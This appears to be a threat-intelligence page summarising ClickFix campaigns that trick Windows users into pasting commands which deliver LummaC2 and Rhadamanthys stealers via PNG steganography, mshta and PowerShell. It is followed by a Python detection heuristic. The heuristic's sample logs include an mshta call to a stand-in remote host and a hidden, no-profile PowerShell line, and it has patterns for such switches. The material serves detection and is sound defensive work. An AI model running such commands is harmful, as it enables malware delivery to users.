
ClickFix variants delivering LummaC2 and Rhadamanthys

Malware Activity · Happening score 21 · 2 unique sources, 2 articles

Summary


Since October 1, ClickFix variants have been using a fake Windows Update screen and human verification lures to trick Windows users into pasting commands that execute malware. The chain hides payloads in PNG steganography and uses mshta and PowerShell to deliver LummaC2 and Rhadamanthys information stealers. The activity matters because the payload is reconstructed in memory, making the malicious delivery harder to spot and block.

Related Happenings

Godzilla (BLUEBEAM) web shell and Cobalt Strike deployment via KnowledgeDeliver exploitation

Malware Activity
First: 26.05.2026 08:19 Last: 26.05.2026 08:19 Sources 1

About this happening: The **Godzilla (BLUEBEAM)** web shell is now being used after **CVE-2026-5426** exploitation to run commands and stage **Cobalt Strike Beacon**, giving attackers a durable foothol...

Vidar infostealer market rise and distribution expansion

Malware Activity
First: 28.04.2026 22:07 Last: 28.04.2026 22:07 Sources 1

About this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...

Venom Stealer MaaS continuous credential theft and exfiltration

Malware Activity
First: 01.04.2026 16:30 Last: 01.04.2026 16:30 Sources 1

About this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

BlackSanta EDR killer malware activity targeting HR departments

Malware Activity
First: 11.03.2026 00:57 Last: 11.03.2026 00:57 Sources 1

About this happening: The **BlackSanta** malware operation has run for **more than a year**, targeting **HR departments** and using an **EDR killer** to weaken host defenses before payload execution. T...

Timeline

  1. 24.11.2025 22:42 1 article · 6mo ago

    ClickFix lures users with fake Windows Update pages

    Initial Disclosure

    ClickFix variants used a full-screen fake Windows Update page or a human verification lure to trick Windows users into pasting attacker-controlled commands into Windows Command Prompt and executing malware on the system.

  2. 24.11.2025 22:42 1 article · 6mo ago

    Operation Endgame disrupts Rhadamanthys Windows Update delivery

    Campaign Scope Update

    On November 13, Operation Endgame disrupted a Rhadamanthys infrastructure segment behind the fake Windows Update lure, and payload delivery stopped on the affected fake Windows Update domains even though the domains remained active.

  3. 24.11.2025 22:42 2 articles · 6mo ago

    PNG steganography and in-memory payload reconstruction

    Technical Analysis Update

    ClickFix variants hid malicious code inside PNG images, used mshta and PowerShell to launch a multi-stage chain, and reconstructed an AES-encrypted payload in memory through a .NET assembly named Stego Loader and the Donut tool. The analyzed attacks delivered LummaC2 and Rhadamanthys information stealers and used ctrampoline evasion with 10,000 empty functions.

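
The mshta-then-PowerShell chain described above leaves a recognisable shape in process-creation telemetry: a script host started from the shell the victim pasted into, fetching remote content, then spawning a quiet PowerShell. The following detection heuristic is an added example, not code from the original page or from the researchers it summarises; the key=value record format, the process names and the switch patterns are assumptions, and the sample records are constructed.

```python
import re

# Constructed process-creation records (key=value, quoted command lines); not real telemetry.
SAMPLE_LOG = r"""
ProcessId=1300 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\mshta.exe CommandLine="mshta https://update-check.invalid/verify"
ProcessId=1400 ParentImage=C:\Windows\System32\mshta.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -nop -c <placeholder>"
ProcessId=1500 ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe report.txt"
ProcessId=1600 ParentImage=C:\Windows\System32\cmd.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell Get-Date"
"""

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe"}   # where a pasted ClickFix command gets run
POWERSHELL = {"powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://", re.I)
# Switches typical of pasted one-liners: hidden window, no profile, encoded command (assumed heuristic).
QUIET_PS = re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile\b|e(?:nc|ncodedcommand)?\b)", re.I)


def parse_events(text):
    """Parse one record per line into dicts, adding lowercased image basenames."""
    events = []
    for line in text.strip().splitlines():
        rec = {k: v.strip('"') for k, v in KV.findall(line)}
        rec["image"] = rec["Image"].rsplit("\\", 1)[-1].lower()
        rec["parent"] = rec["ParentImage"].rsplit("\\", 1)[-1].lower()
        events.append(rec)
    return events


def clickfix_reasons(ev):
    """Return the ClickFix-delivery indicators matched by a single event."""
    reasons = []
    cmd = ev["CommandLine"]
    if ev["image"] == "mshta.exe" and REMOTE_URL.search(cmd):
        reasons.append("mshta loading remote content")
        if ev["parent"] in INTERACTIVE_PARENTS:
            reasons.append("launched from interactive shell (pasted command)")
    if ev["image"] in POWERSHELL:
        if QUIET_PS.search(cmd):
            reasons.append("hidden/encoded powershell")
        if ev["parent"] == "mshta.exe":
            reasons.append("mshta -> powershell chain")
    return reasons


def scan(text):
    """Map ProcessId -> reasons for every event that matched at least one indicator."""
    return {int(ev["ProcessId"]): r for ev in parse_events(text) if (r := clickfix_reasons(ev))}
```

The benign PowerShell launched from cmd.exe (1600) is deliberately left unflagged: the interactive-shell parent alone is not enough, it is the combination with remote content or a quiet PowerShell that marks the chain.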